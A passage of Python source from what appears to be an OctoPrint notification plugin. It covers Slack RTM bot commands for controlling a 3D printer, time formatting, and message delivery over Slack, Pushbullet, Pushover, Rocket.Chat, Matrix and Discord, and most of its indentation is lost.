##the socket disconnect
sc = SlackClient(slackAPIToken)
if sc.rtm_connect(with_team_state=False):
self._logger.debug(
"Successfully reconnected via Slack RTM API"
)
connection_attempt = 0
next_ping = time.time() + ping_interval
else:
self._logger.error("Failed to reconnect via Slack RTM API")
connection_attempt += 1
except Exception as e:
self._logger.error(
"Slack RTM API connection error (Exception): " + str(e)
)
connection_attempt += 1
try:
if next_ping > 0 and time.time() >= next_ping:
ping_rsp = sc.server.ping()
next_ping = time.time() + ping_interval
read_msgs = sc.rtm_read()
if read_msgs:
for msg in read_msgs:
try:
self.process_rtm_message(slackAPIToken, msg)
##Reset error counter if we've successfully processed a message
repeat_error_count = 0
except Exception as e:
self._logger.error(
"Slack RTM message processing error: " + str(e),exc_info=e
)
else:
time.sleep(0.5)
except WebSocketConnectionClosedException as ce:
self._logger.error(
"Slack RTM API read error (WebSocketConnectionClosedException): "
+ str(ce.message), exc_info=ce
)
time.sleep(1)
sc = None
except Exception as e:
error_str = str(e)
self._logger.error(
"Slack RTM API read error (Exception): " + error_str
)
##Observed errors on Windows (WebSocketConnectionClosedException was not thrown)
##HTTPSConnectionPool(host='slack.com', port=443): Max retries exceeded with url: /api/rtm.start (Caused by NewConnectionError('<urllib3.connection.VerifiedHTTPSConnection object at 0x000000000A6FB278>: Failed to establish a new connection: [Errno 11001] getaddrinfo failed',))
##[Errno 10054] An existing connection was forcibly closed by the remote host
if (
"Max retries exceeded" in error_str
or "NewConnectionError" in error_str
or "Errno 10054" in error_str
or "Errno 11001" in error_str
or "forcibly closed" in error_str
):
self._logger.error(
"Slack RTM API experienced a fatal connection error. Resetting connection."
)
sc = None
time.sleep(1)
repeat_error_count += 1
if repeat_error_count >= 100:
self._logger.error(
"Slack RTM API experienced 100 back to back read errors. Resetting connection."
)
sc = None
self._logger.debug("Finished Slack RTM read loop")
except Exception as e:
self._logger.exception(
"Error in Slack RTM read loop, Error: " + str(e.message)
)
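##Exponential backoff for RTM reconnects: 5 * 2^iteration seconds (e.g. 5s, 10s, 20s, ...), capped at 30 minutes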
def get_rtm_reconnect_delay(self, iteration):
max_delay = 1800 ##30 minutes
try:
delay = (2 ** iteration) * 5
if delay <= 0 or delay > max_delay:
return max_delay
return delay
except Exception as e:
self._logger.exception(
"Slack RTM reconnect delay calculation error (iteration="
+ str(iteration)
+ "), Error: "
+ str(e.message)
)
return max_delay
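##Handles an incoming RTM message: only reacts when the bot (or its configured alternate username) is @-mentioned, parses the command that follows the mention, checks authorization, and responds with the configured emoji reactions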
def process_rtm_message(self, slackAPIToken, message):
if not self._settings.get(["slack_apitoken_config"], merged=True).get(
"enable_commands"
):
return
slack_identity_config = self._settings.get(["slack_identity"], merged=True)
slack_as_user = slack_identity_config["existing_user"]
alternate_bot_name = None
if not slack_as_user:
if "username" in slack_identity_config:
alternate_bot_name = slack_identity_config["username"]
alternate_bot_id = None
if not alternate_bot_name == None and len(alternate_bot_name.strip()) > 0:
alternate_bot_id = "@" + alternate_bot_name.strip()
if (self.bot_user_id == None and alternate_bot_id == None) or message == None:
return
if message.get("type") != "message" or message.get("text") == None:
return
bot_id = "<@" + self.bot_user_id + ">"
message_text = message.get("text", "")
matched_id = None
self._logger.debug("matching BI " + str(bot_id) + " and MT " + str(message_text) + " and ABI " + str(alternate_bot_id))
if not message_text:
# no need to test a blank message
return
elif bot_id in message_text:
matched_id = bot_id
elif alternate_bot_id and alternate_bot_id in message_text:
matched_id = alternate_bot_id
else:
return
self._logger.debug("Slack RTM Read: " + json.dumps(message))
source_userid = message.get("user")
source_username = self.get_slack_username(slackAPIToken, source_userid)
self._logger.debug(
"Slack RTM message source UserID: "
+ str(source_userid)
+ ", Username: "
+ str(source_username)
)
channel = message["channel"]
timestamp = message["ts"]
command = message["text"].split(matched_id)[1].strip().lower()
reaction = ""
positive_reaction = self._settings.get(
["slack_apitoken_config"], merged=True
).get("commands_positive_reaction")
negative_reaction = self._settings.get(
["slack_apitoken_config"], merged=True
).get("commands_negative_reaction")
processing_reaction = self._settings.get(
["slack_apitoken_config"], merged=True
).get("commands_processing_reaction")
unauthorized_reaction = self._settings.get(
["slack_apitoken_config"], merged=True
).get("commands_unauthorized_reaction")
if not positive_reaction == None:
positive_reaction = positive_reaction.strip()
if positive_reaction.startswith(":") and positive_reaction.endswith(":"):
positive_reaction = positive_reaction[1:-1].strip()
if not negative_reaction == None:
negative_reaction = negative_reaction.strip()
if negative_reaction.startswith(":") and negative_reaction.endswith(":"):
negative_reaction = negative_reaction[1:-1].strip()
if not processing_reaction == None:
processing_reaction = processing_reaction.strip()
if processing_reaction.startswith(":") and processing_reaction.endswith(
":"
):
processing_reaction = processing_reaction[1:-1].strip()
if not unauthorized_reaction == None:
unauthorized_reaction = unauthorized_reaction.strip()
if unauthorized_reaction.startswith(":") and unauthorized_reaction.endswith(
":"
):
unauthorized_reaction = unauthorized_reaction[1:-1].strip()
sent_processing_reaction = False
enabled_commands = self._settings.get(
["slack_rtm_enabled_commands"], merged=True
)
authorized_users = self._settings.get(
["slack_rtm_authorized_users"], merged=True
)
authorized_user_lookup = {}
for user in authorized_users.split(","):
user = user.strip().lower()
if len(user) > 0:
authorized_user_lookup[user] = True
if len(authorized_user_lookup) == 0:
authorized_user_lookup = None
authorized = self.is_rtm_command_authorized_user(
authorized_user_lookup, source_username, enabled_commands, command
)
if command == "help" and enabled_commands["help"]["enabled"]:
self._logger.info(
"Slack RTM - help command - user: "
+ source_username
+ ", authorized: "
+ str(authorized)
)
if not authorized:
reaction = unauthorized_reaction
else:
self.handle_event("Help", channel, {}, True, False, None)
reaction = positive_reaction
elif command == "stop" and enabled_commands["stop"]["enabled"]:
self._logger.info(
"Slack RTM - stop command - user: "
+ source_username
+ ", authorized: "
+ str(authorized)
)
if not authorized:
reaction = unauthorized_reaction
elif self._printer.is_printing():
##Send processing reaction
sent_processing_reaction = True
self.add_message_reaction(
slackAPIToken, channel, timestamp, processing_reaction, False
)
self._printer.cancel_print()
reaction = positive_reaction
else:
reaction = negative_reaction
elif command == "pause" and enabled_commands["pause"]["enabled"]:
self._logger.info(
"Slack RTM - pause command - user: "
+ source_username
+ ", authorized: "
+ str(authorized)
)
if not authorized:
reaction = unauthorized_reaction
elif self._printer.is_printing():
##Send processing reaction
sent_processing_reaction = True
self.add_message_reaction(
slackAPIToken, channel, timestamp, processing_reaction, False
)
self._printer.toggle_pause_print()
reaction = positive_reaction
else:
reaction = negative_reaction
elif command == "resume" and enabled_commands["resume"]["enabled"]:
self._logger.info(
"Slack RTM - resume command - user: "
+ source_username
+ ", authorized: "
+ str(authorized)
)
if not authorized:
reaction = unauthorized_reaction
elif self._printer.is_paused():
##Send processing reaction
sent_processing_reaction = True
self.add_message_reaction(
slackAPIToken, channel, timestamp, processing_reaction, False
)
self._printer.toggle_pause_print()
reaction = positive_reaction
else:
reaction = negative_reaction
elif command == "status" and enabled_commands["status"]["enabled"]:
##Send processing reaction
self._logger.info(
"Slack RTM - status command - user: "
+ source_username
+ ", authorized: "
+ str(authorized)
)
if not authorized:
reaction = unauthorized_reaction
else:
sent_processing_reaction = True
self.add_message_reaction(
slackAPIToken, channel, timestamp, processing_reaction, False
)
self.handle_event("Progress", channel, {}, True, False, None)
reaction = positive_reaction
else:
reaction = negative_reaction
self.add_message_reaction(slackAPIToken, channel, timestamp, reaction, False)
##Remove the processing reaction if it was previously added
if sent_processing_reaction:
self.add_message_reaction(
slackAPIToken, channel, timestamp, processing_reaction, True
)
def is_rtm_command_authorized_user(
self, authorized_users, username, enabled_commands, command
):
if authorized_users == None or len(authorized_users) == 0:
return True
##The failed command will be handled later
if not command in enabled_commands:
return True
auth_required = enabled_commands[command]["restricted"]
if not auth_required:
return True
username = username.strip().lower()
if username in authorized_users:
return True
return False
def get_slack_username(self, slackAPIToken, userid):
try:
if userid == None:
return
userid = userid.strip()
if len(userid) == 0:
return
slackAPIConnection = Slacker(slackAPIToken, timeout=SLACKER_TIMEOUT)
self._logger.debug(
"Retrieving username for Slack RTM message - User ID: " + userid
)
user_info_rsp = slackAPIConnection.users.info(userid)
self._logger.debug(
"Slack user info rsp for User ID: "
+ userid
+ ", Response: "
+ json.dumps(user_info_rsp.body)
)
return user_info_rsp.body["user"]["name"]
except Exception as e:
self._logger.exception(
"Error retrieving username for Slack RTM message - User ID: "
+ userid
+ ", Error: "
+ str(e.message)
)
def add_message_reaction(self, slackAPIToken, channel, timestamp, reaction, remove):
try:
if reaction == None:
return
reaction = reaction.strip()
if len(reaction) == 0:
return
slackAPIConnection = Slacker(slackAPIToken, timeout=SLACKER_TIMEOUT)
self._logger.debug(
"Sending Slack RTM reaction - Channel: "
+ channel
+ ", Timestamp: "
+ timestamp
+ ", Reaction: "
+ reaction
+ ", Remove: "
+ str(remove)
)
if remove:
reaction_rsp = slackAPIConnection.reactions.remove(
channel=channel, timestamp=timestamp, name=reaction
)
else:
reaction_rsp = slackAPIConnection.reactions.add(
channel=channel, timestamp=timestamp, name=reaction
)
if reaction_rsp.successful == None or reaction_rsp.successful == False:
self._logger.debug(
"Slack RTM send reaction failed - Channel: "
+ channel
+ ", Timestamp: "
+ timestamp
+ ", Reaction: "
+ reaction
+ ", Remove: "
+ str(remove)
+ json.dumps(reaction_rsp.body)
)
else:
self._logger.debug(
"Successfully sent Slack RTM reaction - Channel: "
+ channel
+ ", Timestamp: "
+ timestamp
+ ", Reaction: "
+ reaction
+ ", Remove: "
+ str(remove)
)
except Exception as e:
self._logger.exception(
"Error sending Slack RTM reaction - Channel: "
+ channel
+ ", Timestamp: "
+ timestamp
+ ", Reaction: "
+ reaction
+ ", Remove: "
+ str(remove)
+ ", Error: "
+ str(e.message)
)
def connection_method(self):
return self._settings.get(["connection_method"], merged=True)
def mattermost_mode(self):
return self._settings.get(["mattermost_compatability_mode"], merged=True)
def get_formatting_elements(self):
##Returns bold text start, bold text end, name/value separator (often used when bold can't be used), and newline
connection_method = self.connection_method()
if connection_method == "WEBHOOK" and self.mattermost_mode():
return "**", "**", " ", "\n"
elif connection_method == "WEBHOOK" or connection_method == "APITOKEN":
return "*", "*", " ", "\n"
elif connection_method == "PUSHOVER":
return "<b>", "</b>", " ", "\n"
elif connection_method == "ROCKETCHAT":
return "*", "*", " ", "\n"
elif connection_method == "MATRIX":
return "<b>", "</b>", " ", "<br/>\n"
elif connection_method == "DISCORD":
return "**", "**", " ", "\n"
return "", "", ": ", "\n"
def format_eta(self, seconds):
"""For a given seconds to complete, returns an ETA string for humans.
"""
if seconds is None or seconds == "N/A":
return "N/A"
tz_config = self._settings.get(["timezone"], merged=True)
local_now = datetime.datetime.now()
local_eta = local_now + datetime.timedelta(seconds=seconds)
##Return local OS timestamp
if not tz_config or tz_config == "OS_Default":
eta = local_eta
now = local_now
else:
##Generate TZ adjusted timestamp
tz = pytz.timezone(tz_config)
utc_time = datetime.datetime.utcnow().replace(tzinfo=pytz.utc)
now = utc_time.astimezone(tz)
eta = now + datetime.timedelta(seconds=seconds)
##Config UI string, not an actual python date/time format string
selected_date_format = self._settings.get(["eta_date_format"], merged=True)
if selected_date_format == "HH:mm <fuzzy date>":
return "%s %s" % (eta.strftime("%H:%M"), self.humanize_day_delta(now, eta))
elif selected_date_format == "hh:mm tt <fuzzy date>":
return "%s %s" % (
eta.strftime("%I:%M %p"),
self.humanize_day_delta(now, eta),
)
elif selected_date_format == "MM/dd/yyyy HH:mm":
return eta.strftime("%m/%d/%Y %H:%M")
elif selected_date_format == "dd/MM/yyyy HH:mm":
return eta.strftime("%d/%m/%Y %H:%M")
elif selected_date_format == "MM/dd/yyyy hh:mm tt":
return eta.strftime("%m/%d/%Y %I:%M %p")
elif selected_date_format == "dd/MM/yyyy hh:mm tt":
return eta.strftime("%d/%m/%Y %I:%M %p")
else:
return eta.strftime("%Y-%m-%d %H:%M")
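##Returns 'yesterday'/'today'/'tomorrow' when the ETA falls within a day of now, otherwise an abbreviated month/day (e.g. 'Mar 05')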
def humanize_day_delta(self, now, eta):
new_now = datetime.date(now.year, now.month, now.day)
new_eta = datetime.date(eta.year, eta.month, eta.day)
delta_days = (new_eta - new_now).days
if delta_days == -1:
return "yesterday"
elif delta_days == 0:
return "today"
elif delta_days == 1:
return "tomorrow"
else:
return eta.strftime("%b %d")
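    ## Formats a duration (in seconds) per the configured time format: FUZZY (humanize), EXACT (OctoPrint's formatter), or the plugin's own breakdown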
def format_duration(self, seconds):
time_format = self._settings.get(["time_format"], merged=True)
if seconds == None:
return "N/A"
delta = datetime.timedelta(seconds=seconds)
if time_format == "FUZZY":
return humanize.naturaldelta(delta)
elif time_format == "EXACT":
return octoprint.util.get_formatted_timedelta(delta)
else:
return self.humanize_duration(seconds)
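    ## Builds an "X days Y hours Z minutes" string, appending seconds only when nothing else was shown or less than 10 minutes remain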
def humanize_duration(self, total_seconds):
total_days = int(total_seconds / 86400)
total_seconds -= total_days * 86400
total_hours = int(total_seconds / 3600)
total_seconds -= total_hours * 3600
total_minutes = int(total_seconds / 60)
total_seconds = int(total_seconds - (total_minutes * 60))
time_str = ""
if total_days > 0:
if total_days == 1:
time_str += "1 day"
else:
time_str += str(total_days) + " days"
if total_hours > 0 or len(time_str) > 0:
if len(time_str) > 0:
time_str += " "
if total_hours != 1:
time_str += str(total_hours) + " hours"
else:
time_str += "1 hour"
if total_minutes > 0 or len(time_str) > 0:
if len(time_str) > 0:
time_str += " "
if total_minutes != 1:
time_str += str(total_minutes) + " minutes"
else:
time_str += "1 minute"
##Only display seconds if nothing else has been displayed or if there is less than 10 minutes left
if len(time_str) == 0 or (
total_days == 0 and total_hours == 0 and total_minutes < 10
):
if len(time_str) > 0:
time_str += " "
if total_seconds != 1:
time_str += str(total_seconds) + " seconds"
else:
time_str += "1 second"
return time_str
_bot_progress_last_req = None
_bot_progress_last_snapshot_queue = Queue.Queue()
_slack_next_progress_snapshot_time = 0
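    ## Executes the configured shell command for an event, optionally capturing stdout, and places the return code, output, and error message on the command_rsp queue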
def execute_command(self, event, command, capture_output, command_rsp):
self._logger.debug(
"Executing command for event: " + event + ' - "' + command + '"'
)
return_code = None
command_output = None
error_msg = None
try:
execution_start = time.time()
if capture_output:
pipeline = run(command, stdout=Capture())
else:
pipeline = run(command)
execution_elapsed = time.time() - execution_start
pipeline_cmd = pipeline.commands[0]
if capture_output:
command_output = pipeline_cmd.stdout.text
return_code = pipeline_cmd.returncode
self._logger.debug(
"Command executed in "
+ str(round(execution_elapsed, 2))
+ " seconds"
+ " - ReturnCode: "
+ str(return_code)
+ ", Command: "
+ command
+ ", Output: "
+ str(command_output)
)
except Exception as e:
error_msg = e.message
if type(e) == ValueError:
self._logger.error(
"Failed to execute command for event: " + event + " - " + e.message
)
else:
self._logger.exception(
"Failed to execute command for event: " + event + " - " + str(e)
)
command_rsp.put(return_code)
command_rsp.put(command_output)
command_rsp.put(error_msg)
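    ## Builds the notification for an event and delivers it via the configured connection method
    ## (Slack API/WebHook, Pushbullet, Pushover, Rocket.Chat, Matrix, or Discord), optionally
    ## attaching a snapshot, command results, and timelapse details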
def send_slack_message(
self,
event,
event_settings,
event_payload,
channel_override,
fallback,
pretext,
title,
text,
color,
fields,
footer,
includeSnapshot,
print_pct_complete,
command_thread,
command_thread_rsp,
capture_command_returncode,
capture_command_output,
):
try:
slackAPIToken = None
slackWebHookUrl = None
pushbulletAccessToken = None
pushoverAppToken = None
rocketChatServerURL = None
rocketChatUsername = None
rocketChatPassword = None
matrixServerURL = None
matrixAccessToken = None
matrixUserID = None
bold_text_start, bold_text_end, name_val_sep, newline = (
self.get_formatting_elements()
)
connection_method = self.connection_method()
progress_update_method = (
self._settings.get(["supported_events"], merged=True)
.get("Progress")
.get("UpdateMethod")
)
slack_progress_snapshot_min_interval = 60 * int(
self._settings.get(["supported_events"], merged=True)
.get("Progress")
.get("SlackMinSnapshotUpdateInterval")
)
self._logger.debug("Octoslack connection method: " + connection_method)
if connection_method == "APITOKEN":
slackAPIToken = self._settings.get(
["slack_apitoken_config"], merged=True
).get("api_token")
if not slackAPIToken == None:
slackAPIToken = slackAPIToken.strip()
if slackAPIToken == None or len(slackAPIToken) == 0:
self._logger.error(
"Slack API connection not available, skipping message send"
)
return
elif connection_method == "WEBHOOK":
slackWebHookUrl = self._settings.get(
["slack_webhook_config"], merged=True
).get("webhook_url")
if not slackWebHookUrl == None:
slackWebHookUrl = slackWebHookUrl.strip()
if slackWebHookUrl == None or len(slackWebHookUrl) == 0:
self._logger.error(
"Slack WebHook connection not available, skipping message send"
)
return
elif connection_method == "PUSHBULLET":
pushbulletAccessToken = self._settings.get(
["pushbullet_config"], merged=True
).get("access_token")
if not pushbulletAccessToken == None:
pushbulletAccessToken = pushbulletAccessToken.strip()
if pushbulletAccessToken == None or len(pushbulletAccessToken) == 0:
self._logger.error(
"Pushbullet connection not available, skipping message send"
)
return
elif connection_method == "PUSHOVER":
pushoverAppToken = self._settings.get(
["pushover_config"], merged=True
).get("app_token")
if not pushoverAppToken == None:
pushoverAppToken = pushoverAppToken.strip()
if pushoverAppToken == None or len(pushoverAppToken) == 0:
self._logger.error(
"Pushover connection not available, skipping message send"
)
return
elif connection_method == "ROCKETCHAT":
rocketChatServerURL = self._settings.get(
["rocketchat_config"], merged=True
).get("server_url")
rocketChatUsername = self._settings.get(
["rocketchat_config"], merged=True
).get("username")
rocketChatPassword = self._settings.get(
["rocketchat_config"], merged=True
).get("password")
if not rocketChatServerURL == None:
rocketChatServerURL = rocketChatServerURL.strip()
if not rocketChatUsername == None:
rocketChatUsername = rocketChatUsername.strip()
if not rocketChatPassword == None:
rocketChatPassword = rocketChatPassword.strip()
if (
rocketChatServerURL == None
or len(rocketChatServerURL) == 0
or rocketChatUsername == None
or len(rocketChatUsername) == 0
or rocketChatPassword == None
or len(rocketChatPassword) == 0
):
self._logger.error(
"Rocket.Chat connection not available, skipping message send"
)
return
elif connection_method == "MATRIX":
matrixServerURL = self._settings.get(
["matrix_config"], merged=True
).get("server_url")
matrixAccessToken = self._settings.get(
["matrix_config"], merged=True
).get("access_token")
matrixUserID = self._settings.get(["matrix_config"], merged=True).get(
"user_id"
)
if not matrixServerURL == None:
matrixServerURL = matrixServerURL.strip()
if not matrixAccessToken == None:
matrixAccessToken = matrixAccessToken.strip()
if not matrixUserID == None:
matrixUserID = matrixUserID.strip()
if (
matrixServerURL == None
or len(matrixServerURL) == 0
or matrixAccessToken == None
or len(matrixAccessToken) == 0
or matrixUserID == None
or len(matrixUserID) == 0
):
self._logger.error(
"Matrix connection not available, skipping message send"
                    )
                    return
attachments = [{}]
attachment = attachments[0]
attachment["mrkdwn_in"] = ["text", "pretext"]
hosted_url = None
snapshot_upload_method = self._settings.get(
["snapshot_upload_method"], merged=True
)
snapshot_url_to_append = None
snapshot_msg = None
snapshot_error_msgs = None
if includeSnapshot:
hosted_url, error_msgs, slack_rsp = self.upload_snapshot()
snapshot_error_msgs = error_msgs
if hosted_url:
if snapshot_upload_method == "SLACK":
if slackAPIToken:
now = time.time()
if event == "Progress" and (
self._slack_next_progress_snapshot_time > 0
and now < self._slack_next_progress_snapshot_time
):
snapshot_msg = None
else:
if event == "Progress":
self._slack_next_progress_snapshot_time = (
now + slack_progress_snapshot_min_interval
)
desc = event + " snapshot"
if (
event == "Progress"
and print_pct_complete
and print_pct_complete != "N/A"
):
desc = desc + " taken @ " + print_pct_complete
snapshot_msg = {
"local_file": hosted_url,
"filename": "snapshot.jpg",
"description": desc,
}
else:
if snapshot_error_msgs == None:
snapshot_error_msgs = []
self._logger.error(
"Slack API connection required for Slack asset uploads"
)
snapshot_error_msgs.append(
"Slack API connection required for Slack asset uploads"
)
else:
attachment["image_url"] = hosted_url
snapshot_url_to_append = hosted_url
##No need to append the URL to the body text as Slack will expose the URL itself
if (
connection_method == "APITOKEN"
or (
connection_method == "WEBHOOK"
and not self.mattermost_mode()
)
or connection_method == "PUSHBULLET"
or connection_method == "PUSHOVER"
or (
connection_method == "ROCKETCHAT"
and snapshot_upload_method == "ROCKETCHAT"
)
or (
connection_method == "MATRIX"
and snapshot_upload_method == "MATRIX"
)
or connection_method == "DISCORD"
):
snapshot_url_to_append = None
if snapshot_error_msgs:
if text == None:
text = ""
elif len(text) > 0:
text += newline
text += bold_text_start + "Snapshot error(s):" + bold_text_end
if connection_method == "WEBHOOK" and self.mattermost_mode():
text += "\n* " + "\n* ".join(error_msgs)
else:
for error_msg in snapshot_error_msgs:
if (
connection_method == "WEBHOOK"
or connection_method == "APITOKEN"
):
text += "\n *-* "
elif connection_method == "PUSHOVER":
text += (
newline
+ " "
+ bold_text_start
+ " - "
+ bold_text_end
+ " "
)
else:
text += newline + " - "
text += error_msg
if (
capture_command_returncode or capture_command_output
) and command_thread:
try:
cmd_return_code = None
cmd_output = None
cmd_error_msg = None
command_thread.join(COMMAND_EXECUTION_WAIT) ##seconds
if command_thread.isAlive():
cmd_error_msg = (
"Command did not return within "
+ str(COMMAND_EXECUTION_WAIT)
+ " seconds"
)
else:
cmd_return_code = command_thread_rsp.get()
cmd_output = command_thread_rsp.get()
cmd_error_msg = command_thread_rsp.get()
if capture_command_returncode and cmd_return_code:
if text == None:
text = ""
elif len(text) > 0:
text += newline
text += (
bold_text_start
+ "Command return code"
+ bold_text_end
+ name_val_sep
+ str(cmd_return_code)
)
if capture_command_output and cmd_output:
if text == None:
text = ""
elif len(text) > 0:
text += newline
text += (
bold_text_start
+ "Command output"
+ bold_text_end
+ name_val_sep
+ str(cmd_output)
)
if cmd_error_msg and len(cmd_error_msg.strip()) > 0:
if text == None:
text = ""
elif len(text) > 0:
text += newline
text += (
bold_text_start
+ "Command execution error"
+ bold_text_end
+ name_val_sep
+ str(cmd_error_msg.strip())
)
except Exception as e:
self._logger.exception(
"An error occurred while waiting for the command thread to return or while retrieving the command output: "
+ str(e)
)
if text == None:
text = ""
elif len(text) > 0:
text += newline
text += (
bold_text_start
+ "Command execution error"
+ bold_text_end
+ name_val_sep
+ str(e.message)
)
if (
connection_method == "WEBHOOK"
and self.mattermost_mode()
and not footer == None
and len(footer) > 0
):
if text == None:
text = ""
elif len(text) > 0:
text += newline
text += "`" + footer + "`"
footer = None
elif not footer == None and len(footer) > 0:
attachment["footer"] = footer
if not snapshot_url_to_append == None:
if text == None:
text = ""
elif len(text) > 0:
text += newline
text += hosted_url
if not fields == None:
attachment["fields"] = fields
if not fallback == None and len(fallback) > 0:
attachment["fallback"] = fallback
if not pretext == None and len(pretext) > 0:
if connection_method == "WEBHOOK" and self.mattermost_mode():
pretext = "##### " + pretext + " #####"
attachment["pretext"] = pretext
if not title == None and len(title) > 0:
attachment["title"] = title
if not color == None and len(color) > 0:
attachment["color"] = color
channels = channel_override
if channels == None or len(channels.strip()) == 0:
if connection_method == "WEBHOOK" or connection_method == "APITOKEN":
channels = self._settings.get(["channel"], merged=True)
elif connection_method == "PUSHBULLET":
channels = self._settings.get(
["pushbullet_config"], merged=True
).get("channel")
elif connection_method == "PUSHOVER":
channels = "$myself$"
elif connection_method == "ROCKETCHAT":
channels = self._settings.get(
["rocketchat_config"], merged=True
).get("channel")
elif connection_method == "MATRIX":
channels = self._settings.get(["matrix_config"], merged=True).get(
"channel"
)
elif connection_method == "DISCORD":
channels = self._settings.get(["discord_config"], merged=True).get(
"webhook_urls"
)
if not channels:
channels = ""
if event == "MovieDone":
upload_timelapse = (
self._settings.get(["supported_events"], merged=True)
.get("MovieDone")
.get("UploadMovie")
)
if upload_timelapse == True:
timelapse_url, timelapse_errors = self.upload_timelapse_movie(
event_payload["movie"], channels
)
upload_timelapse_link = (
self._settings.get(["supported_events"], merged=True)
.get("MovieDone")
.get("UploadMovieLink")
)
if timelapse_url and upload_timelapse_link:
if text == None:
text = ""
elif len(text) > 0:
text += newline
text += (
bold_text_start
+ "Timelapse"
+ bold_text_end
+ name_val_sep
+ timelapse_url
)
if timelapse_errors:
if text == None:
text = ""
elif len(text) > 0:
text += newline
text += bold_text_start + "Timelapse error(s):" + bold_text_end
if connection_method == "WEBHOOK" and self.mattermost_mode():
text += "\n* " + "\n* ".join(timelapse_errors)
else:
for timelapse_error in timelapse_errors:
if (
connection_method == "WEBHOOK"
or connection_method == "APITOKEN"
):
text += "\n *-* "
elif connection_method == "PUSHOVER":
text += (
newline
+ " "
+ bold_text_start
+ " - "
+ bold_text_end
+ " "
)
else:
text += newline + " - "
text += timelapse_error
if not text == None and len(text) > 0:
attachment["text"] = text
##Generate message JSON
attachments_json = json.dumps(attachments)
self._logger.debug(
"postMessage - Channels: " + channels + ", JSON: " + attachments_json
)
slack_identity_config = self._settings.get(["slack_identity"], merged=True)
slack_as_user = slack_identity_config["existing_user"]
slack_icon_url = None
slack_icon_emoji = None
slack_username = None
if not slack_as_user:
if (
"icon_url" in slack_identity_config
and len(slack_identity_config["icon_url"].strip()) > 0
):
slack_icon_url = slack_identity_config["icon_url"].strip()
if (
not self.mattermost_mode()
and "icon_emoji" in slack_identity_config
and len(slack_identity_config["icon_emoji"].strip()) > 0
):
slack_icon_emoji = slack_identity_config["icon_emoji"].strip()
if (
"username" in slack_identity_config
and len(slack_identity_config["username"].strip()) > 0
):
slack_username = slack_identity_config["username"].strip()
allow_empty_channel = connection_method == "WEBHOOK"
if len(channels) == 0:
self._logger.debug("No channels configured")
self._logger.debug(
"postMessage - username="
+ str(slack_username)
+ ", as_user="
+ str(slack_as_user)
+ ", icon_url="
+ str(slack_icon_url)
+ ", icon_emoji="
+ str(slack_icon_emoji)
)
for channel in channels.split(","):
channel = channel.strip()
if len(channel) == 0 and not allow_empty_channel:
continue
allow_empty_channel = False
if not slackAPIToken == None and len(slackAPIToken) > 0:
try:
slackAPIConnection = Slacker(
slackAPIToken, timeout=SLACKER_TIMEOUT
)
##Applies to both standard Progress events as well as '@bot status' Slack RTM commands
if event == "Progress":
if (
self._bot_progress_last_req
and progress_update_method == "INPLACE"
and connection_method == "APITOKEN"
):
apiRsp = slackAPIConnection.chat.update(
self._bot_progress_last_req.body["channel"],
ts=self._bot_progress_last_req.body["ts"],
text="",
attachments=attachments_json,
)
else:
apiRsp = slackAPIConnection.chat.post_message(
channel,
text="",
username=slack_username,
as_user=slack_as_user,
attachments=attachments_json,
icon_url=slack_icon_url,
icon_emoji=slack_icon_emoji,
)
self._bot_progress_last_req = apiRsp
else:
apiRsp = slackAPIConnection.chat.post_message(
channel,
text="",
username=slack_username,
as_user=slack_as_user,
attachments=attachments_json,
icon_url=slack_icon_url,
icon_emoji=slack_icon_emoji,
)
self._logger.debug(
"Slack API message send response: " + apiRsp.raw
)
if snapshot_msg:
##TODO Doing the upload here makes it difficult to append any error messages to the slack message.
##consider doing the upload first
hosted_url, error_msgs, slack_resp = self.upload_slack_asset(
snapshot_msg["local_file"],
snapshot_msg["filename"],
snapshot_msg["description"],
channel,
None,
)
if snapshot_msg.get("local_file"):
try:
self._logger.debug(
"Deleting local Slack asset: "
+ str(snapshot_msg["local_file"])
)
os.remove(snapshot_msg["local_file"])
except Exception as e:
self._logger.error(
"Deletion of local Slack asset failed. Local path: {}, Error: {}".format(
snapshot_msg["local_file"], e
)
)
if event == "Progress":
# bump out the 'next time' again as an upload can take some time
                                self._slack_next_progress_snapshot_time = (
time.time() + slack_progress_snapshot_min_interval
)
if (
progress_update_method == "INPLACE"
and connection_method == "APITOKEN"
and self._bot_progress_last_snapshot_queue.qsize()
> 0
):
while (
not self._bot_progress_last_snapshot_queue.empty()
):
prev_snapshot = (
self._bot_progress_last_snapshot_queue.get()
)
if prev_snapshot == None:
break
fid = None
try:
fid = prev_snapshot.body["file"]["id"]
self._logger.debug(
"Deleting Slack snapshot: " + str(fid)
)
slackAPIConnection.files.delete(fid)
except Exception as e:
self._logger.error(
"Slack snapshot deletion error. Slack FileID: {}, Error: {}".format(
str(fid), e
)
)
self._bot_progress_last_snapshot_queue.put(slack_resp)
except Exception as e:
self._logger.exception(
"Slack API message send error: " + str(e)
)
elif not slackWebHookUrl == None and len(slackWebHookUrl) > 0:
slack_msg = {}
slack_msg["channel"] = channel
if not slack_as_user == None:
slack_msg["as_user"] = slack_as_user
if not slack_icon_url == None and len(slack_icon_url.strip()) > 0:
slack_msg["icon_url"] = slack_icon_url.strip()
if (
not slack_icon_emoji == None
and len(slack_icon_emoji.strip()) > 0
):
slack_msg["icon_emoji"] = slack_icon_emoji.strip()
if not slack_username == None and len(slack_username.strip()) > 0:
slack_msg["username"] = slack_username.strip()
slack_msg["attachments"] = attachments
self._logger.debug(
"Slack WebHook postMessage json: " + json.dumps(slack_msg)
)
try:
webHook = IncomingWebhook(slackWebHookUrl)
webHookRsp = webHook.post(slack_msg)
self._logger.debug(
"Slack WebHook postMessage response: " + webHookRsp.text
)
if not webHookRsp.ok:
self._logger.error(
"Slack WebHook message send failed: " + webHookRsp.text
)
except Exception as e:
self._logger.exception(
"Slack WebHook message send error: " + str(e)
)
elif (
not pushbulletAccessToken == None and len(pushbulletAccessToken) > 0
):
self._logger.debug("Send Pushbullet msg start")
pb = Pushbullet(pushbulletAccessToken)
pb_title = None
pb_body = None
if not pretext == None and len(pretext) > 0:
pb_title = pretext
if not text == None and len(text) > 0:
pb_body = text
if not footer == None and len(footer) > 0:
if pb_body == None:
pb_body = ""
elif len(text) > 0:
pb_body += newline
pb_body += footer
if pb_title == None:
pb_title = ""
if pb_body == None:
pb_body = ""
self._logger.debug("Pushbullet msg title: " + pb_title)
self._logger.debug("Pushbullet msg body: " + pb_body)
channel_obj = None
if channel and not channel.lower() == "$myself$":
try:
channel_obj = pb.get_channel(channel)
except Exception as e:
self._logger.exception(
"Failed to retrieve Pushbullet channel ("
+ channel
+ ") information: "
+ str(e)
)
continue
if hosted_url and len(hosted_url) > 0:
##def push_file(self, file_name, file_url, file_type, body=None, title=None, device=None, chat=None, email=None, channel=None):
